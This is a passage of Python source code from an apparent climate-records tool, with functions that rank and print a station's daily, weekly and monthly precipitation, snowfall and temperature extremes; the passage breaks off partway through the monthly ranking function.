Ensure desired quantity is an integer in the range [5,50]") DAYS_prcp = [] DAYS_snow = [] DAYS_snwd = [] DAYS_tmax = [] DAYS_tmin = [] DAYS_tavg = [] # YEARS.append(year_attr(y,round(mean(clmt[y][attribute]),1))) DAYS_prcp = [day_attr(D.year,V) for V in clmt_vars_days["prcp"] for D in clmt_vars_days["prcp"][V] if D.month == m and D.day == d] DAYS_snow = [day_attr(D.year,V) for V in clmt_vars_days["snow"] for D in clmt_vars_days["snow"][V] if D.month == m and D.day == d] DAYS_snwd = [day_attr(D.year,V) for V in clmt_vars_days["snwd"] for D in clmt_vars_days["snwd"][V] if D.month == m and D.day == d] DAYS_tmax = [day_attr(D.year,V) for V in clmt_vars_days["tmax"] for D in clmt_vars_days["tmax"][V] if D.month == m and D.day == d] DAYS_tmin = [day_attr(D.year,V) for V in clmt_vars_days["tmin"] for D in clmt_vars_days["tmin"][V] if D.month == m and D.day == d] DAYS_tavg = [day_attr(D.year,V) for V in clmt_vars_days["tavg"] for D in clmt_vars_days["tavg"][V] if D.month == m and D.day == d] DAYS_prcp.sort(key=lambda x:x.number,reverse=True) DAYS_snow.sort(key=lambda x:x.number,reverse=True) DAYS_snwd.sort(key=lambda x:x.number,reverse=True) DAYS_tmax_asc = DAYS_tmax.copy() DAYS_tmax.sort(key=lambda x:x.number,reverse=True) DAYS_tmax_asc.sort(key=lambda x:x.number) DAYS_tmin_asc = DAYS_tmin.copy() DAYS_tmin.sort(key=lambda x:x.number,reverse=True) DAYS_tmin_asc.sort(key=lambda x:x.number) DAYS_tavg_asc = DAYS_tavg.copy() DAYS_tavg.sort(key=lambda x:x.number,reverse=True) DAYS_tavg_asc.sort(key=lambda x:x.number) # This block will control if one of the above lists happen to have a length of zero; it's to avoid error if len(DAYS_prcp) == 0: DAYS_prcp = [day_attr(9999,0)] if len(DAYS_snow) == 0: DAYS_snow = [day_attr(9999,0)] if len(DAYS_snwd) == 0: DAYS_snwd = [day_attr(9999,0)] # 15|17|17|15|19|16 # print("{:2}{} {:4} {:3} | {:2}{} {:4} {:3} | {:2}{} {:4} {:3} | {:2}{} {:4} {:3}" TMAX and TMIN # print(" {:2}{} {:4} {:5} | {:2}{} {:4} {:4}" PRCP and SNOW print("") 
print("{:^59}".format("Precipitation Records for {} {}".format(calendar.month_name[m],d))) print("{:^59}".format("{}, {}".format(clmt["station"],clmt["station_name"]))) print("{:-^59}".format("")) print("{:^19}|{:^19}|{:^19}".format("Rain","Snow","Snow Depth")) print("{:-^19}|{:-^19}|{:-^19}".format("","","")) i = 0; j = 0; k = 0 ranked_i = []; ranked_j = []; ranked_k = [] for x in range(max(len(DAYS_prcp),len(DAYS_snow),len(DAYS_snwd))): if x == 0: i += 1; j += 1; k += 1 else: try: if DAYS_prcp[x].number != DAYS_prcp[x-1].number: i += 1 if DAYS_prcp[x].number == 0: i = qty + 1 except: i = qty + 1 try: if DAYS_snow[x].number != DAYS_snow[x-1].number: j += 1 if DAYS_snow[x].number == 0: j = qty + 1 except: j = qty + 1 try: if DAYS_snwd[x].number != DAYS_snwd[x-1].number: k += 1 if DAYS_snwd[x].number == 0: k = qty + 1 except: k = qty + 1 #print(i,j,k) if all(QTY > qty for QTY in [i,j,k]): break else: try: print(" {} | {} | {} ".format( "{:2}{} {:4} {}".format( i if i not in ranked_i and i <= qty and DAYS_prcp[x].number > 0 else "", "." if i not in ranked_i and i <= qty and DAYS_prcp[x].number > 0 else " ", DAYS_prcp[x].year if i <= qty and x <= len(DAYS_prcp)-1 and DAYS_prcp[x].number > 0 else "", "{:5.2f}".format(DAYS_prcp[x].number) if i <= qty and x <= len(DAYS_prcp)-1 and DAYS_prcp[x].number > 0 else " " ), "{:2}{} {:4} {}".format( j if j not in ranked_j and j <= qty and DAYS_snow[x].number > 0 else "", "." if j not in ranked_j and j <= qty and DAYS_snow[x].number > 0 else " ", DAYS_snow[x].year if j <= qty and x <= len(DAYS_snow)-1 and DAYS_snow[x].number > 0 else "", "{:5.1f}".format(DAYS_snow[x].number) if j <= qty and x <= len(DAYS_snow)-1 and DAYS_snow[x].number > 0 else " " ), "{:2}{} {:4} {}".format( k if k not in ranked_k and k <= qty and DAYS_snwd[x].number > 0 else "", "." 
if k not in ranked_k and k <= qty and DAYS_snwd[x].number > 0 else " ", DAYS_snwd[x].year if k <= qty and x <= len(DAYS_snwd)-1 and DAYS_snwd[x].number > 0 else "", "{:5.1f}".format(DAYS_snwd[x].number) if k <= qty and x <= len(DAYS_snwd)-1 and DAYS_snwd[x].number > 0 else " " ) )) except Exception as e: print(x,i,j,k) traceback.print_tb(e) if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) print("\n{:^102}".format("Temperature Records for {} {}".format(calendar.month_name[m],d))) print("{:^102}".format("{}, {}".format(clmt["station"],clmt["station_name"]))) print("{:-^102}".format("")) print("{:^34}|{:^33}|{:^33}".format("TAVG","TMAX","TMIN")) print("{:-^34}|{:-^33}|{:-^33}".format("","","")) print("{:^16}|{:^17}|{:^16}|{:^16}|{:^16}|{:^16}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest")) print("{:-^16}|{:-^17}|{:-^16}|{:-^16}|{:-^16}|{:-^16}".format("","","","","","")) i = 0; j = 0; k = 0; l = 0; m = 0; n = 0 ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = [] for x in range(max(len(DAYS_tavg),len(DAYS_tmax),len(DAYS_tmin))): if x == 0: i += 1; j += 1; k += 1; l += 1; m += 1; n += 1 else: try: if DAYS_tavg[x].number != DAYS_tavg[x-1].number: i += 1 except: i = qty + 1 try: if DAYS_tavg_asc[x].number != DAYS_tavg_asc[x-1].number: j += 1 except: j = qty + 1 try: if DAYS_tmax[x].number != DAYS_tmax[x-1].number: k += 1 except: k = qty + 1 try: if DAYS_tmax_asc[x].number != DAYS_tmax_asc[x-1].number: l += 1 except: l = qty + 1 try: if DAYS_tmin[x].number != DAYS_tmin[x-1].number: m += 1 except: m = qty + 1 try: if DAYS_tmin_asc[x].number != DAYS_tmin_asc[x-1].number: n += 1 except: n = qty + 1 if all(QTY > qty for QTY in [i,j,k,l,m,n]): break else: print("{} | {} | {} | {} | {} | {} ".format( "{:2}{} {:4} {}".format( i if i not in ranked_i and i <= qty else "", "." 
if i not in ranked_i and i <= qty else " ", DAYS_tavg[x].year if i <= qty else "", "{:5.1f}".format(DAYS_tavg[x].number) if i <= qty else " " ), "{:2}{} {:4} {}".format( j if j not in ranked_j and j <= qty else "", "." if j not in ranked_j and j <= qty else " ", DAYS_tavg_asc[x].year if j <= qty else "", "{:5.1f}".format(DAYS_tavg_asc[x].number) if j <= qty else " " ), "{:2}{} {:4} {}".format( k if k not in ranked_k and k <= qty else "", "." if k not in ranked_k and k <= qty else " ", DAYS_tmax[x].year if k <= qty else "", "{:4}".format(DAYS_tmax[x].number) if k <= qty else " " ), "{:2}{} {:4} {}".format( l if l not in ranked_l and l <= qty else "", "." if l not in ranked_l and l <= qty else " ", DAYS_tmax_asc[x].year if l <= qty else "", "{:4}".format(DAYS_tmax_asc[x].number) if l <= qty else " " ), "{:2}{} {:4} {}".format( m if m not in ranked_m and m <= qty else "", "." if m not in ranked_m and m <= qty else " ", DAYS_tmin[x].year if m <= qty else "", "{:4}".format(DAYS_tmin[x].number) if m <= qty else " " ), "{:2}{} {:4} {}".format( n if n not in ranked_n and n <= qty else "", "." if n not in ranked_n and n <= qty else " ", DAYS_tmin_asc[x].year if n <= qty else "", "{:4}".format(DAYS_tmin_asc[x].number) if n <= qty else " " ) )) #print("---",i,j,k,l,m,n,"---") if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) print("") def weekRank(mo,d,qty): """Returns a list of rankings (maxs and mins) based on a specific week. The passed arguments of month and day will be the center of the week. It only accepts arguments for the month, day, and the how many rankings you want to list (ie, top 10; 15; etc). Passed arguments MUST be integers. 
    # Tiny record type pairing a year with that year's aggregated weekly value.
    class week_attr:
        def __init__(self,y,number):
            self.year = y
            self.number = number
    # Argument validation; each failure prints a message and returns None.
    if type(mo) != int or type(d) != int or type(qty) != int: return print("* SORRY! Month AND Day need to be submitted as integers")
    if mo < 1 or mo > 12: return print("* Sorry! Make sure month entry is in the range [1,12]")
    if d < 1 or d > 31: return print("* Sorry! Invalid Day entered.")
    if mo in [4,6,9,11] and d == 31: return print("*Sorry! Only months numbered 1,3,5,7,8,10,12 have 31 days")
    if mo == 2 and d > 29: return print("* Sorry! February never has 30+ days")
    if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! Ensure desired quantity is an integer in the range [5,50]")
    WEEKS_prcp = []
    WEEKS_snow = []
    WEEKS_snwd = []
    WEEKS_tavg = []
    WEEKS_tmax = []
    WEEKS_tmin = []
    # Feb 29 is shifted to Feb 28 so the center date exists in every year.
    if mo == 2 and d == 29: d = 28
    # wkorig is only used for the report's header labels (year 1999 is arbitrary).
    wkorig = datetime.date(1999,mo,d) - datetime.timedelta(days=3)
    for y in [YR for YR in clmt if type(YR) == int]:
        # The week runs from 3 days before the center date to 3 days after.
        wkstart = datetime.date(y,mo,d) - datetime.timedelta(days=3)
        wklist = []
        wk_prcp = []
        wk_snow = []
        wk_snwd = []
        wk_tavg = []
        wk_tmax = []
        wk_tmin = []
        for DAY in range(7):
            wklist.append(wkstart)
            wkstart += datetime.timedelta(days=1)
        for DAY in wklist:
            #input(clmt[y][DAY.month][DAY.day].daystr)
            #if y == 1984:
            #print("HI TEMP: {}; DAY: {}".format(clmt[y][DAY.month][DAY.day].tmax,clmt[y][DAY.month][DAY.day].daystr))
            # Only observations whose quality flag is acceptable (in ignoreflags)
            # are counted; missing days/attributes are silently skipped.
            try:
                #print(clmt[y][DAY.month][DAY.day].prcpQ in ignoreflags)
                if clmt[DAY.year][DAY.month][DAY.day].prcpQ in ignoreflags: wk_prcp.append(float(clmt[DAY.year][DAY.month][DAY.day].prcp))
            except: pass
            try:
                if clmt[DAY.year][DAY.month][DAY.day].snowQ in ignoreflags: wk_snow.append(float(clmt[DAY.year][DAY.month][DAY.day].snow))
            except: pass
            try:
                if clmt[DAY.year][DAY.month][DAY.day].snwdQ in ignoreflags: wk_snwd.append(float(clmt[DAY.year][DAY.month][DAY.day].snwd))
            except: pass
            try:
                # TAVG needs both TMAX and TMIN valid (flags OK and not sentinel values).
                if clmt[DAY.year][DAY.month][DAY.day].tmaxQ in ignoreflags and clmt[DAY.year][DAY.month][DAY.day].tmax not in ["9999","-9999",""] and clmt[DAY.year][DAY.month][DAY.day].tminQ in ignoreflags and clmt[DAY.year][DAY.month][DAY.day].tmin not in ["9999","-9999",""]:
                    wk_tavg.append(int(clmt[DAY.year][DAY.month][DAY.day].tmax))
                    wk_tavg.append(int(clmt[DAY.year][DAY.month][DAY.day].tmin))
            except: pass
            try:
                if clmt[DAY.year][DAY.month][DAY.day].tmaxQ in ignoreflags: wk_tmax.append(int(clmt[DAY.year][DAY.month][DAY.day].tmax))
            except: pass
            try:
                if clmt[DAY.year][DAY.month][DAY.day].tminQ in ignoreflags: wk_tmin.append(int(clmt[DAY.year][DAY.month][DAY.day].tmin))
            except: pass
        # Weekly aggregates: prcp/snow are summed, snow depth is averaged over 7,
        # temps are averaged. excludeweek/excludeweek_tavg (module globals) are
        # presumably minimum day counts for a week to qualify — TODO confirm.
        try: WEEKS_prcp.append(week_attr(y,round(sum(wk_prcp),2)))
        except: pass
        try: WEEKS_snow.append(week_attr(y,round(sum(wk_snow),1)))
        except: pass
        if len(wk_snwd) > 0:
            try: WEEKS_snwd.append(week_attr(y,round(sum(wk_snwd)/7,1)))
            except: pass
        if len(wk_tavg) > excludeweek_tavg:
            try: WEEKS_tavg.append(week_attr(y,round(mean(wk_tavg),1)))
            except: pass
        if len(wk_tmax) > excludeweek:
            try:
                WEEKS_tmax.append(week_attr(y,round(mean(wk_tmax),1)))
                #if y == 1984: print(round(mean(wk_tmax),1))
            except: pass
        if len(wk_tmin) > excludeweek:
            try: WEEKS_tmin.append(week_attr(y,round(mean(wk_tmin),1)))
            except: pass
    #print(len(WEEKS_tavg),len(WEEKS_tmax),len(WEEKS_tmin),len(WEEKS_prcp),len(WEEKS_snow))
    #input()
    # Descending sorts for "most/warmest"; *_asc copies hold ascending order.
    WEEKS_prcp.sort(key=lambda x:x.number,reverse=True)
    WEEKS_snow.sort(key=lambda x:x.number,reverse=True)
    WEEKS_snwd.sort(key=lambda x:x.number,reverse=True)
    WEEKS_tavg_asc = WEEKS_tavg.copy()
    WEEKS_tavg.sort(key=lambda x:x.number,reverse=True)
    WEEKS_tavg_asc.sort(key=lambda x:x.number)
    WEEKS_tmax_asc = WEEKS_tmax.copy()
    WEEKS_tmax.sort(key=lambda x:x.number,reverse=True)
    WEEKS_tmax_asc.sort(key=lambda x:x.number)
    WEEKS_tmin_asc = WEEKS_tmin.copy()
    WEEKS_tmin.sort(key=lambda x:x.number,reverse=True)
    WEEKS_tmin_asc.sort(key=lambda x:x.number)
    #for x in WEEKS_tavg:
    #print(x.year,"-",x.number)
    #input()
    print("")
    print("{:^59}".format("Precipitation Records for the Week of {} {} - {} {}".format(calendar.month_abbr[wkorig.month],wkorig.day, calendar.month_abbr[(wkorig + datetime.timedelta(days=6)).month],(wkorig + datetime.timedelta(days=6)).day)))
    print("{:^59}".format("{}, {}".format(clmt["station"],clmt["station_name"])))
    print("{:^59}".format("Weeks with >= {} Day(s) of Data".format(excludeweek+1)))
    print("{:-^59}".format(""))
    print("{:^19}|{:^19}|{:^19}".format("Rain","Snow","Avg Snow Depth"))
    print("{:-^19}|{:-^19}|{:-^19}".format("","",""))
    # i/j/k: current rank for prcp/snow/snwd; ties share a rank, a counter is
    # pushed past qty when its list is exhausted or the value reaches zero.
    i = 0; j = 0; k = 0
    ranked_i = []; ranked_j = []; ranked_k = []
    for x in range(max(len(WEEKS_prcp),len(WEEKS_snow),len(WEEKS_snwd))):
        if x == 0: i += 1; j += 1; k += 1
        else:
            try:
                if WEEKS_prcp[x].number != WEEKS_prcp[x-1].number: i += 1
                if WEEKS_prcp[x].number == 0: i = qty + 1
            except: i = qty + 1
            try:
                if WEEKS_snow[x].number != WEEKS_snow[x-1].number: j += 1
                if WEEKS_snow[x].number == 0: j = qty + 1
            except: j = qty + 1
            try:
                if WEEKS_snwd[x].number != WEEKS_snwd[x-1].number: k += 1
                if WEEKS_snwd[x].number == 0: k = qty + 1
            except: k = qty + 1
        #print(i,j,k)
        if all(QTY > qty for QTY in [i,j,k]): break
        else:
            print(" {} | {} | {} ".format(
                "{:2}{} {:4} {}".format(
                    i if i not in ranked_i and i <= qty and x <= len(WEEKS_prcp)-1 and WEEKS_prcp[x].number > 0 else "",
                    "." if i not in ranked_i and i <= qty and x <= len(WEEKS_prcp)-1 and WEEKS_prcp[x].number > 0 else " ",
                    WEEKS_prcp[x].year if i <= qty and x <= len(WEEKS_prcp)-1 and WEEKS_prcp[x].number > 0 else "",
                    "{:5.2f}".format(WEEKS_prcp[x].number) if i <= qty and x <= len(WEEKS_prcp)-1 and WEEKS_prcp[x].number > 0 else " "
                ),
                "{:2}{} {:4} {}".format(
                    j if j not in ranked_j and j <= qty and x <= len(WEEKS_snow)-1 and WEEKS_snow[x].number > 0 else "",
                    "." if j not in ranked_j and j <= qty and x <= len(WEEKS_snow)-1 and WEEKS_snow[x].number > 0 else " ",
                    WEEKS_snow[x].year if j <= qty and x <= len(WEEKS_snow)-1 and WEEKS_snow[x].number > 0 else "",
                    "{:5.1f}".format(WEEKS_snow[x].number) if j <= qty and x <= len(WEEKS_snow)-1 and WEEKS_snow[x].number > 0 else " "
                ),
                "{:2}{} {:4} {}".format(
                    k if k not in ranked_k and k <= qty and x <= len(WEEKS_snwd)-1 and WEEKS_snwd[x].number > 0 else "",
                    "." if k not in ranked_k and k <= qty and x <= len(WEEKS_snwd)-1 and WEEKS_snwd[x].number > 0 else " ",
                    WEEKS_snwd[x].year if k <= qty and x <= len(WEEKS_snwd)-1 and WEEKS_snwd[x].number > 0 else "",
                    "{:5.1f}".format(WEEKS_snwd[x].number) if k <= qty and x <= len(WEEKS_snwd)-1 and WEEKS_snwd[x].number > 0 else " "
                )
            ))
        if i not in ranked_i and i <= qty: ranked_i.append(i)
        if j not in ranked_j and j <= qty: ranked_j.append(j)
        if k not in ranked_k and k <= qty: ranked_k.append(k)
    print("\n{:^106}".format("Temperature Records for the Week of {} {} - {} {}".format(calendar.month_abbr[wkorig.month],wkorig.day, calendar.month_abbr[(wkorig + datetime.timedelta(days=6)).month],(wkorig + datetime.timedelta(days=6)).day)))
    print("{:^106}".format("{}, {}".format(clmt["station"],clmt["station_name"])))
    print("{:^106}".format("Weeks with >= {} Day(s) of Data".format(excludeweek+1)))
    print("{:-^106}".format(""))
    print("{:^34}|{:^35}|{:^35}".format("TAVG","TMAX","TMIN"))
    print("{:-^34}|{:-^35}|{:-^35}".format("","",""))
    print("{:^16}|{:^17}|{:^17}|{:^17}|{:^17}|{:^17}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest"))
    print("{:-^16}|{:-^17}|{:-^17}|{:-^17}|{:-^17}|{:-^17}".format("","","","","",""))
    # Six rank counters: tavg desc/asc, tmax desc/asc, tmin desc/asc.
    i = 0; j = 0; k = 0; l = 0; m = 0; n = 0
    ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = []
    for x in range(max(len(WEEKS_tavg),len(WEEKS_tmax),len(WEEKS_tmin))):
        if x == 0: i += 1; j += 1; k += 1; l += 1; m += 1; n += 1
        else:
            try:
                if WEEKS_tavg[x].number != WEEKS_tavg[x-1].number: i += 1
            except: i = qty + 1
            try:
                if WEEKS_tavg_asc[x].number != WEEKS_tavg_asc[x-1].number: j += 1
            except: j = qty + 1
            try:
                if WEEKS_tmax[x].number != WEEKS_tmax[x-1].number: k += 1
            except: k = qty + 1
            try:
                if WEEKS_tmax_asc[x].number != WEEKS_tmax_asc[x-1].number: l += 1
            except: l = qty + 1
            try:
                if WEEKS_tmin[x].number != WEEKS_tmin[x-1].number: m += 1
            except: m = qty + 1
            try:
                if WEEKS_tmin_asc[x].number != WEEKS_tmin_asc[x-1].number: n += 1
            except: n = qty + 1
        if all(QTY > qty for QTY in [i,j,k,l,m,n]): break
        else:
            print("{} | {} | {} | {} | {} | {} ".format(
                "{:2}{} {:4} {}".format(
                    i if i not in ranked_i and i <= qty else "",
                    "." if i not in ranked_i and i <= qty else " ",
                    WEEKS_tavg[x].year if i <= qty else "",
                    "{:5.1f}".format(WEEKS_tavg[x].number) if i <= qty else " "
                ),
                "{:2}{} {:4} {}".format(
                    j if j not in ranked_j and j <= qty else "",
                    "." if j not in ranked_j and j <= qty else " ",
                    WEEKS_tavg_asc[x].year if j <= qty else "",
                    "{:5.1f}".format(WEEKS_tavg_asc[x].number) if j <= qty else " "
                ),
                "{:2}{} {:4} {}".format(
                    k if k not in ranked_k and k <= qty else "",
                    "." if k not in ranked_k and k <= qty else " ",
                    WEEKS_tmax[x].year if k <= qty else "",
                    "{:5.1f}".format(WEEKS_tmax[x].number) if k <= qty else " "
                ),
                "{:2}{} {:4} {}".format(
                    l if l not in ranked_l and l <= qty else "",
                    "." if l not in ranked_l and l <= qty else " ",
                    WEEKS_tmax_asc[x].year if l <= qty else "",
                    "{:5.1f}".format(WEEKS_tmax_asc[x].number) if l <= qty else " "
                ),
                "{:2}{} {:4} {}".format(
                    m if m not in ranked_m and m <= qty else "",
                    "." if m not in ranked_m and m <= qty else " ",
                    WEEKS_tmin[x].year if m <= qty else "",
                    "{:5.1f}".format(WEEKS_tmin[x].number) if m <= qty else " "
                ),
                "{:2}{} {:4} {}".format(
                    n if n not in ranked_n and n <= qty else "",
                    "." if n not in ranked_n and n <= qty else " ",
                    WEEKS_tmin_asc[x].year if n <= qty else "",
                    "{:5.1f}".format(WEEKS_tmin_asc[x].number) if n <= qty else " "
                )
            ))
        #print("---",i,j,k,l,m,n,"---")
        if i not in ranked_i and i <= qty: ranked_i.append(i)
        if j not in ranked_j and j <= qty: ranked_j.append(j)
        if k not in ranked_k and k <= qty: ranked_k.append(k)
        if l not in ranked_l and l <= qty: ranked_l.append(l)
        if m not in ranked_m and m <= qty: ranked_m.append(m)
        if n not in ranked_n and n <= qty: ranked_n.append(n)
    print("")

def monthRank(mo: int, attribute: str, qty: int) -> None:
    """Returns a list of rankings (maxs and mins) based on a specific month.
    It only accepts arguments for the month, the kind of stats ("prcp" or
    "temps"), and how many rankings you want to list (ie, top 10; 15; etc).
    The attribute MUST be in string format, while the month and quantity MUST
    be integers.

    monthRank(month,attribute,quantity)

    EXAMPLE: monthRank(3,"rain",20) -> Returns the "Top 20" Precipitation Rankings for March
    """
    # Tiny record type pairing a (year, month) with its aggregated value.
    class month_attr:
        def __init__(self,y,mo,number):
            self.year = y
            self.month = mo
            self.number = number
    # Argument validation; each failure prints a message and returns None.
    if type(mo) != int or mo < 1 or mo > 12: return print("* OOPS! {} is an invalid month. Ensure type(m) == int and is range [1,12]".format(mo))
    if attribute not in ["temp","temps","temperature","temperatures","tmax","tmin","tavg","prcp","precip","rain","snow"]: return print("* OOPS! Attribute must be 'temp' or 'prcp'. Try again!")
    if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! Ensure desired quantity is an integer in the range [5,50]")
    # Normalize the many accepted aliases down to the two handled modes.
    if attribute in ["prcp","precip","rain","snow"]: attribute = "prcp"
    if attribute in ["temp","temps","temperature","temperatures","tmax","tmin","tavg"]: attribute = "temp"
    MONTHS_prcp = []
    MONTHS_prcp_asc = [] # Declared here bc it will be compiled with in for-loop
    MONTHS_prcpDAYS = []
    MONTHS_prcpDAYS_asc = [] # Declared here bc it will be compiled with in for-loop
    MONTHS_snow = []
    MONTHS_snowDAYS = []
    MONTHS_tavg = []
    MONTHS_tmax = []
    MONTHS_tmin = []
    # One aggregate per year for the requested month; excludemonth /
    # excludemonth_tavg (module globals) gate sparsely-observed months —
    # presumably minimum day counts; TODO confirm.
    for y in [YR for YR in clmt if type(YR) == int]:
        try:
            MONTHS_prcp.append(month_attr(y,mo,round(sum(clmt[y][mo]["prcp"]),2)))
            MONTHS_prcpDAYS.append(month_attr(y,mo,clmt[y][mo]["prcpDAYS"]))
            if clmt[y][mo]["recordqty"] > excludemonth:
                MONTHS_prcp_asc.append(month_attr(y,mo,round(sum(clmt[y][mo]["prcp"]),2)))
                MONTHS_prcpDAYS_asc.append(month_attr(y,mo,clmt[y][mo]["prcpDAYS"]))
            MONTHS_snow.append(month_attr(y,mo,round(sum(clmt[y][mo]["snow"]),1)))
            MONTHS_snowDAYS.append(month_attr(y,mo,clmt[y][mo]["snowDAYS"]))
        except: pass
        try:
            if len(clmt[y][mo]["tempAVGlist"]) > excludemonth_tavg: MONTHS_tavg.append(month_attr(y,mo,round(mean(clmt[y][mo]["tempAVGlist"]),1)))
        except: pass
        try:
            if len(clmt[y][mo]["tmax"]) > excludemonth: MONTHS_tmax.append(month_attr(y,mo,round(mean(clmt[y][mo]["tmax"]),1)))
        except: pass
        try:
            if len(clmt[y][mo]["tmin"]) > excludemonth: MONTHS_tmin.append(month_attr(y,mo,round(mean(clmt[y][mo]["tmin"]),1)))
        except: pass
    # Descending sorts for "most/warmest"; *_asc lists hold ascending order.
    # (prcp_asc/prcpDAYS_asc were filled separately above, filtered by recordqty.)
    #MONTHS_prcp_asc = MONTHS_prcp.copy()
    MONTHS_prcp.sort(key=lambda x:x.number,reverse=True)
    MONTHS_prcp_asc.sort(key=lambda x:x.number)
    #MONTHS_prcpDAYS_asc = MONTHS_prcpDAYS.copy()
    MONTHS_prcpDAYS.sort(key=lambda x:x.number,reverse=True)
    MONTHS_prcpDAYS_asc.sort(key=lambda x:x.number)
    MONTHS_snow.sort(key=lambda x:x.number,reverse=True)
    MONTHS_snowDAYS.sort(key=lambda x:x.number,reverse=True)
    MONTHS_tavg_asc = MONTHS_tavg.copy()
    MONTHS_tavg.sort(key=lambda x:x.number,reverse=True)
    MONTHS_tavg_asc.sort(key=lambda x:x.number)
    MONTHS_tmax_asc = MONTHS_tmax.copy()
    MONTHS_tmax.sort(key=lambda x:x.number,reverse=True)
    MONTHS_tmax_asc.sort(key=lambda x:x.number)
    MONTHS_tmin_asc = MONTHS_tmin.copy()
    MONTHS_tmin.sort(key=lambda x:x.number,reverse=True)
    MONTHS_tmin_asc.sort(key=lambda x:x.number)
    # print("{:67}|{:32}")
    # print("{:18}|{:18}|{:14}|{:14}|{:17}|{:14}")
    # print(" {:2}{} {:4} {:6} | {:2}{} {:4} {:6} | {:2}{} {:4} {:2} | {:2}{} {:4} {:2} | {:2}{} {:4} {:5} | {:2}{} {:4} {:2} "
    # print(" {:2}{} {:4} {:2} | {:2}{} {:4} {:2} "
    print("")
    if attribute == "prcp":
        print("{:^100}".format("Ranked {} Monthly Precipitation Amounts and Days".format(calendar.month_name[mo])))
        print("{:^100}".format("{}, {}".format(clmt["station"],clmt["station_name"])))
        print("{:^100}".format("Months with >= {} Day(s) of Data".format(excludemonth+1)))
        print("{:-^100}".format(""))
        print("{:^67}|{:^32}".format("Rain","Snow"))
        print("{:-^67}|{:-^32}".format("",""))
        print("{:^18}|{:^18}|{:^14}|{:^14}|{:^17}|{:^14}".format("Wettest","Driest","Most Days","Least Days","Snowiest","Most Days"))
        print("{:-^18}|{:-^18}|{:-^14}|{:-^14}|{:-^17}|{:-^14}".format("","","","","",""))
        # Ranks start at 1 here (unlike day/weekRank which start at 0 and
        # bump on the first pass); ties share a rank.
        i = 1;j = 1;k = 1;l = 1;m = 1;n = 1
        ranked_i = [];ranked_j = [];ranked_k = [];ranked_l = [];ranked_m = [];ranked_n = []
        # min() (not max()) over the six list lengths: rows print only while
        # every column still has an entry at index x.
        for x in range(min(len(MONTHS_prcp),len(MONTHS_prcp_asc),len(MONTHS_prcpDAYS_asc),len(MONTHS_prcpDAYS),len(MONTHS_snow),len(MONTHS_snowDAYS))):
            if x == 0:
                print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:2} | {:2}{} {:4} {:2} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>2} ".format(
                    1,".",MONTHS_prcp[x].year,"{:.2f}".format(MONTHS_prcp[x].number),
                    1,".",MONTHS_prcp_asc[x].year,"{:.2f}".format(MONTHS_prcp_asc[x].number),
                    1,".",MONTHS_prcpDAYS[x].year,MONTHS_prcpDAYS[x].number,
                    1,".",MONTHS_prcpDAYS_asc[x].year,MONTHS_prcpDAYS_asc[x].number,
                    1 if MONTHS_snow[x].number else "",
                    "." if MONTHS_snow[x].number > 0 else " ",
                    MONTHS_snow[x].year if MONTHS_snow[x].number > 0 else "",
                    "{:.1f}".format(MONTHS_snow[x].number) if MONTHS_snow[x].number > 0 else "",
                    1 if MONTHS_snowDAYS[x].number > 0 else "",
                    "." if MONTHS_snowDAYS[x].number > 0 else " ",
                    MONTHS_snowDAYS[x].year if MONTHS_snowDAYS[x].number > 0 else "",
                    MONTHS_snowDAYS[x].number if MONTHS_snowDAYS[x].number > 0 else ""))
                ranked_i.append(i);ranked_j.append(j);ranked_k.append(k);ranked_l.append(l);ranked_m.append(m);ranked_n.append(n)
            else:
                if i not in ranked_i and i <= qty: ranked_i.append(i)
                if j not in ranked_j and j <= qty: ranked_j.append(j)
                if k not in ranked_k and k <= qty: ranked_k.append(k)
                if l not in ranked_l and l <= qty: ranked_l.append(l)
                if m not in ranked_m and m <= qty: ranked_m.append(m)
                if n not in ranked_n and n <= qty: ranked_n.append(n)
                if MONTHS_prcp[x].number != MONTHS_prcp[x-1].number: i += 1
                if MONTHS_prcp_asc[x].number != MONTHS_prcp_asc[x-1].number: j += 1
                if MONTHS_prcpDAYS[x].number != MONTHS_prcpDAYS[x-1].number: k += 1
                if MONTHS_prcpDAYS_asc[x].number != MONTHS_prcpDAYS_asc[x-1].number: l += 1
                if MONTHS_snow[x].number != MONTHS_snow[x-1].number: m += 1
                if MONTHS_snowDAYS[x].number != MONTHS_snowDAYS[x-1].number: n += 1
                # A column is retired (rank forced past qty) once its value hits zero.
                if MONTHS_prcp[x].number == 0: i = qty + 1
                if MONTHS_prcpDAYS[x].number == 0: k = qty + 1
                if MONTHS_snow[x].number == 0: m = qty + 1
                if MONTHS_snowDAYS[x].number == 0: n = qty + 1
                if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty:
                    print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:2} | {:2}{} {:4} {:2} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>2} ".format(
                        i if i not in ranked_i and i <= qty else "",
                        "." if i not in ranked_i and i <= qty else " ",
                        MONTHS_prcp[x].year if i <= qty else "",
                        "{:.2f}".format(MONTHS_prcp[x].number) if i <= qty else "",
                        j if j not in ranked_j and j <= qty else "",
                        "." if j not in ranked_j and j <= qty else " ",
                        MONTHS_prcp_asc[x].year if j <= qty else "",
                        "{:.2f}".format(MONTHS_prcp_asc[x].number) if j <= qty else "",
                        k if k not in ranked_k and k <= qty else "",
                        "." if k not in ranked_k and k <= qty else " ",
                        MONTHS_prcpDAYS[x].year if k <= qty else "",
                        MONTHS_prcpDAYS[x].number if k <= qty else "",
                        l if l not in ranked_l and l <= qty else "",
                        "." if l not in ranked_l and l <= qty else " ",
                        MONTHS_prcpDAYS_asc[x].year if l <= qty else "",
